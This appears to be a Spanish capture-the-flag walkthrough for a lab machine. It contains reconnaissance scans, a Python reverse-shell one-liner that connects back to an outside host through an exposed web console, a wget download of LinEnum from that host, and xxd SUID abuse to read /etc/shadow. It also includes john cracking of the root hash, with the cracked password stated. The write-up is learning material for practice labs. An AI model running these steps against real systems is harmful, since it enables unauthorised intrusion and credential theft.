nmap -A -p- -oA debug 172.31.1.5 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210712074609.png

nmap -sC -sV -O -p- -oA debug 172.31.1.5

nmap -sU -O -p- -oA debug-udp 172.31.1.5

nikto -h 172.31.1.5:80

gobuster dir -k -u http://172.31.1.5/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210712074826.png

Vemos que en http://172.31.1.5/console se puede ejecutar comandos en python

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.12",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

nc -lvnp 1234

Nos damos cuenta que somos el usuario megan

Pasted image 20210712075707.png

Despues subimos LinEnum.sh

python3 -m http.sever 8888

```cd /tmp````

wget http://10.10.0.12:8888/LinEnum.sh

chmod +x LinEnum.sh

Pasted image 20210712080834.png

Vemos que el archivo xxd tiene una vulnerabilidad

Pasted image 20210712084001.png

https://gtfobins.github.io/gtfobins/xxd/#suid

xxd /etc/shadow | xxd -r

Pasted image 20210712084652.png

Copiamos el hash del usuario root a un archivo y corremos john

john debug_hash

Pasted image 20210712085259.png

su root

Y introducimos la contrasena shanghai

Pasted image 20210712085443.png

boxes

copyright©2022 Cu3rv0x all rights reserved